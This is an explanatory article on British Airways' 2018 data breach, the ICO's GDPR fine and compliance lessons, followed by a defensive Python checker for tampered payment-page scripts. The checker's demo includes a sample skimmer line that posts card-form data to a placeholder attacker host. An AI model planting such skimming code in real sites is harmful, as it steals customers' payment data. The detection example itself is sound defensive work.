British Airways (BA) faced a significant data breach in 2018 that led to a substantial fine under the EU's General Data Protection Regulation (GDPR). The incident and subsequent investigation highlight key aspects of GDPR compliance and the potential consequences of non-compliance.



Data Breach Details
In the summer of 2018, a cyberattack compromised British Airways' systems, leading to the theft of personal data belonging to approximately 400,000 customers. The stolen data included:
- Names
- Addresses
- Credit card numbers
- CVV codes
- Travel booking details
- Login information
The attackers exploited poor security arrangements, redirecting users to a fraudulent website to harvest their data. The breach occurred because of compromised login credentials from a third-party supplier and an unsecured administrator password. BA also stored card details unnecessarily and in plaintext.
GDPR Fine and Legal Consequences
The UK Information Commissioner's Office (ICO) initially intended to fine British Airways £183.39 million. However, after negotiations, the fine was reduced to £20 million in October 2020. The financial strain of the COVID-19 pandemic was considered a factor in reducing the fine. Despite the reduction, it remained the largest GDPR fine issued by the ICO to that date. In addition to the fine, a class-action lawsuit was filed on behalf of affected customers, which was later settled out of court.
Key GDPR Infringements
The ICO's investigation revealed that British Airways failed to comply with its obligations under the GDPR, specifically:
- Article 5(1)(f) (integrity and confidentiality): BA failed to process personal data in a manner that ensured appropriate security.
- Article 32 (security of processing): BA did not implement appropriate technical and organizational measures to protect personal data.
The ICO found that BA was negligent and could have prevented the breach by implementing readily available security measures, such as multi-factor authentication, restricted access to applications, and rigorous testing of systems.
Lessons Learned and Compliance
The British Airways data breach serves as a case study in GDPR compliance failure, highlighting the importance of:
- Implementing robust security measures
- Maintaining up-to-date systems and software
- Monitoring for unauthorized changes to website code
- Complying with the PCI Data Security Standard (PCI DSS)
- Gaining visibility into the partner ecosystem
- Promptly notifying affected individuals and regulatory agencies of data breaches
- Providing clear and transparent information about data processing activities
- Ensuring data minimization and limiting data retention
- Providing adequate training to employees on data protection requirements
By addressing these areas, organizations can better protect personal data and avoid significant GDPR fines and reputational damage.
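The lesson on monitoring for unauthorized changes to website code, as an added example that is not part of the original article and not BA's own tooling: a script-integrity check that compares the script tags on a served payment page against a baseline of expected hosts and content hashes, flagging scripts loaded from a foreign domain, scripts that are not inventoried, and known scripts whose content has changed. The hosts, script contents and page below are constructed placeholders, and `fetch_script` is a caller-supplied hook rather than a real fetcher.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed baseline for a hypothetical payment page (not BA's real assets):
# the script hosts the site owner expects, and the SHA-256 of each known-good script.
ALLOWED_HOSTS = {"www.example-airline.test", "cdn.example-airline.test"}
KNOWN_GOOD = {
    "https://cdn.example-airline.test/js/base.js": b"window.app = {};",
    "https://cdn.example-airline.test/js/checkout.js": b"function pay(f) { post('/pay', f); }",
}
BASELINE = {url: hashlib.sha256(src).hexdigest() for url, src in KNOWN_GOOD.items()}

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r'\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

def audit_page(html, fetch_script):
    """Compare a served page's scripts against the baseline; returns (type, detail) tuples.
    fetch_script(url) -> bytes is caller-supplied so the check sees what a browser would load."""
    findings = []
    for attrs, body in SCRIPT_TAG.findall(html):
        m = SRC_ATTR.search(attrs)
        if m is None:
            if body.strip():  # inline script not covered by the baseline
                findings.append(("inline-script", hashlib.sha256(body.encode()).hexdigest()[:16]))
            continue
        src = m.group(1)
        host = urlparse(src).netloc
        if host and host not in ALLOWED_HOSTS:
            findings.append(("unexpected-host", src))  # script loaded from a foreign domain
        elif src not in BASELINE:
            findings.append(("unlisted-script", src))  # same-origin but not inventoried
        elif hashlib.sha256(fetch_script(src)).hexdigest() != BASELINE[src]:
            findings.append(("modified-script", src))  # known script, content changed
    return findings

def demo():
    """Constructed page where checkout.js was altered and a foreign script was injected."""
    served = dict(KNOWN_GOOD)
    served["https://cdn.example-airline.test/js/checkout.js"] = (
        b"function pay(f) { post('https://skimmer.example.test/c', f); post('/pay', f); }"
    )
    page = (
        '<html><body><script src="https://cdn.example-airline.test/js/base.js"></script>'
        '<script src="https://cdn.example-airline.test/js/checkout.js"></script>'
        '<script src="https://skimmer.example.test/gateway.js"></script></body></html>'
    )
    return audit_page(page, lambda url: served.get(url, b""))
```

Run `demo()` to see the two findings; in practice the check would be scheduled against the live payment page and its findings routed to the team that owns the site.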


